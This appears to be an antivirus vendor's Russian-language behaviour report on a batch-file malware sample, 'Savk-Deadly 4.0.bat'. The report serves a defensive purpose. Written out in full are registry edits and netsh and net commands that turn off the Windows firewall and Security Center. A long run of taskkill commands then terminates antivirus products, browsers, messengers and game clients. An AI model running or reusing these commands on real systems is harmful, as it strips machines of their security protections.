Техническая информация
Вредоносные функции:
Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра:
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
Запускает на исполнение:
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\Savk-Deadly 4.0.bat" "
- <SYSTEM32>\net.exe stop Security Center
- <SYSTEM32>\net1.exe stop Security Center
- <SYSTEM32>\netsh.exe firewall set opmode mode=disable
- <SYSTEM32>\tasklist.exe /M
- <SYSTEM32>\find.exe "."
- <SYSTEM32>\find.exe /V "dll"
- <SYSTEM32>\find.exe /V "services.exe"
- <SYSTEM32>\find.exe /V "lsass.exe"
- <SYSTEM32>\find.exe /V "svchost.exe"
- <SYSTEM32>\find.exe /V "winlogon.exe"
- <SYSTEM32>\find.exe /V "explorer.exe"
- <SYSTEM32>\find.exe /V "System.exe"
- <SYSTEM32>\find.exe /V "smss.exe"
- <SYSTEM32>\find.exe /V "csrss.exe"
- <SYSTEM32>\find.exe /V "cmd.exe"
- <SYSTEM32>\taskkill.exe /IM ipconf.tsp, /F
- <SYSTEM32>\taskkill.exe /IM spoolsv.exe /F
- <SYSTEM32>\taskkill.exe /IM winspool.drv, /F
- <SYSTEM32>\taskkill.exe /IM ctfmon.exe /F
- <SYSTEM32>\taskkill.exe /IM alg.exe /F
- <SYSTEM32>\taskkill.exe /IM __cd75efb816b2cc__.exe /F
- <SYSTEM32>\taskkill.exe /IM 360tray.exe /F
- <SYSTEM32>\taskkill.exe /IM ageofconan.exe /F
- <SYSTEM32>\taskkill.exe /IM aion.exe /F
- <SYSTEM32>\taskkill.exe /IM ash.exe /F
- <SYSTEM32>\taskkill.exe /IM ashAvast.exe /F
- <SYSTEM32>\taskkill.exe /IM ashAvSrv.exe /F
- <SYSTEM32>\taskkill.exe /IM avgcc.exe /F
- <SYSTEM32>\taskkill.exe /IM AVGCC32.EXE /F
- <SYSTEM32>\taskkill.exe /IM AVGCTRL.EXE /F
- <SYSTEM32>\taskkill.exe /IM AVP.COM /F
- <SYSTEM32>\taskkill.exe /IM AVP.EXE /F
- <SYSTEM32>\taskkill.exe /IM AVP32.EXE /F
- <SYSTEM32>\taskkill.exe /IM AVPCC.EXE /F
- <SYSTEM32>\taskkill.exe /IM AVPM.EXE /F
- <SYSTEM32>\taskkill.exe /IM AVSYNMGR.EXE /F
- <SYSTEM32>\taskkill.exe /IM bdagent.exe /F
- <SYSTEM32>\taskkill.exe /IM bdss.exe /F
- <SYSTEM32>\taskkill.exe /IM bdsubmit.exe /F
- <SYSTEM32>\taskkill.exe /IM cabalmain.exe /F
- <SYSTEM32>\taskkill.exe /IM ccapp.exe /F
- <SYSTEM32>\taskkill.exe /IM chrome.exe /F
- <SYSTEM32>\taskkill.exe /IM ClamWin.exe /F
- <SYSTEM32>\taskkill.exe /IM dekaron.exe /F
- <SYSTEM32>\taskkill.exe /IM dnf.exe /F
- <SYSTEM32>\taskkill.exe /IM drweb.exe /F
- <SYSTEM32>\taskkill.exe /IM Drweb32w.exe /F
- <SYSTEM32>\taskkill.exe /IM drweb386.exe /F
- <SYSTEM32>\taskkill.exe /IM Drwebupw.exe /F
- <SYSTEM32>\taskkill.exe /IM Drwebwcl.exe /F
- <SYSTEM32>\taskkill.exe /IM egni.exe /F
- <SYSTEM32>\taskkill.exe /IM ekrn.exe /F
- <SYSTEM32>\taskkill.exe /IM elementclient.exe /F
- <SYSTEM32>\taskkill.exe /IM firefox.exe /F
- <SYSTEM32>\taskkill.exe /IM fsav.exe /F
- <SYSTEM32>\taskkill.exe /IM fsav32.exe /F
- <SYSTEM32>\taskkill.exe /IM fsavaui.exe /F
- <SYSTEM32>\taskkill.exe /IM fsavgui.exe /F
- <SYSTEM32>\taskkill.exe /IM gc.exe /F
- <SYSTEM32>\taskkill.exe /IM ge.exe /F
- <SYSTEM32>\taskkill.exe /IM googletalk.exe /F
- <SYSTEM32>\taskkill.exe /IM GUARD.EXE /F
- <SYSTEM32>\taskkill.exe /IM GVOnline.bin /F
- <SYSTEM32>\taskkill.exe /IM gw.exe /F
- <SYSTEM32>\taskkill.exe /IM httplook.exe /F
- <SYSTEM32>\taskkill.exe /IM ICQ.exe /F
- <SYSTEM32>\taskkill.exe /IM iexplore.exe /F
- <SYSTEM32>\taskkill.exe /IM InphaseNXD.exe /F
- <SYSTEM32>\taskkill.exe /IM l2.bin /F
- <SYSTEM32>\taskkill.exe /IM lin.bin /F
- <SYSTEM32>\taskkill.exe /IM lotroclient.exe /F
- <SYSTEM32>\taskkill.exe /IM magent.exe /F
- <SYSTEM32>\taskkill.exe /IM maplestory.exe /F
- <SYSTEM32>\spoolsv.exe
- <SYSTEM32>\taskkill.exe /IM MCAGENT.EXE /F
- <SYSTEM32>\taskkill.exe /IM Mir3Game.exe /F
- <SYSTEM32>\taskkill.exe /IM miranda32.exe /F
- <SYSTEM32>\taskkill.exe /IM mpftray.exe /F
- <SYSTEM32>\taskkill.exe /IM msn6.exe /F
- <SYSTEM32>\taskkill.exe /IM msnmsgr.exe /F
- <SYSTEM32>\taskkill.exe /IM NAVAPW32.EXE /F
- <SYSTEM32>\taskkill.exe /IM netxray.exe /F
- <SYSTEM32>\taskkill.exe /IM nod.exe /F
- <SYSTEM32>\taskkill.exe /IM nod32.exe /F
- <SYSTEM32>\taskkill.exe /IM opera.exe /F
- <SYSTEM32>\taskkill.exe /IM outpost.exe /F
- <SYSTEM32>\taskkill.exe /IM pidgin.exe /F
- <SYSTEM32>\taskkill.exe /IM qip.exe /F
- <SYSTEM32>\taskkill.exe /IM Ragexe.exe /F
- <SYSTEM32>\taskkill.exe /IM RagFree.exe /F
- <SYSTEM32>\taskkill.exe /IM skype.exe /F
- <SYSTEM32>\taskkill.exe /IM smc.exe /F
- <SYSTEM32>\taskkill.exe /IM so3d.exe /F
- <SYSTEM32>\taskkill.exe /IM spidernt.exe /F
- <SYSTEM32>\taskkill.exe /IM sro_client.exe /F
- <SYSTEM32>\taskkill.exe /IM trillian.exe /F
- <SYSTEM32>\taskkill.exe /IM TwelveSky2.exe /F
- <SYSTEM32>\taskkill.exe /IM WebMoney.exe /F
- <SYSTEM32>\taskkill.exe /IM winbaram.exe /F
- <SYSTEM32>\taskkill.exe /IM windump.exe /F
- <SYSTEM32>\taskkill.exe /IM woool.exe /F
- <SYSTEM32>\taskkill.exe /IM wow.exe /F
- <SYSTEM32>\taskkill.exe /IM wsm.exe /F
- <SYSTEM32>\taskkill.exe /IM YahooMessenger.exe /F
- <SYSTEM32>\taskkill.exe /IM ybclient.exe /F
- <SYSTEM32>\taskkill.exe /IM zapro.exe /F
- <SYSTEM32>\taskkill.exe /IM zlclient.exe /F
- <SYSTEM32>\taskkill.exe /IM ZONEALARM.EXE /F
- <SYSTEM32>\taskkill.exe /IM ZZ__cd75efb816b2cc__.exe /F
- <SYSTEM32>\taskkill.exe /IM thp.exe /F
- <SYSTEM32>\taskkill.exe /IM <Служебное имя>.exe /F
- <SYSTEM32>\taskkill.exe /IM cscript.exe /F
Завершает или пытается завершить
следующие системные процессы:
- <SYSTEM32>\spoolsv.exe
- <SYSTEM32>\ctfmon.exe
- <SYSTEM32>\alg.exe
- <SYSTEM32>\cscript.exe
большое количество пользовательских процессов.
Изменения в файловой системе:
Создает следующие файлы:
- %TEMP%\1.tmp\Savk-Deadly 4.0.bat
- %TEMP%\1.tmp\TList1
- %TEMP%\1.tmp\TList2
- %TEMP%\1.tmp\TList3
- %TEMP%\1.tmp\TList4
- %TEMP%\1.tmp\TList5
- %TEMP%\1.tmp\TList6
- %TEMP%\1.tmp\TList7
- %TEMP%\1.tmp\TList8
- %TEMP%\1.tmp\TList9
- %TEMP%\1.tmp\TList10
- %TEMP%\1.tmp\TList11
- %TEMP%\1.tmp\TList12
Другое:
Ищет следующие окна:
- ClassName: '' WindowName: ''
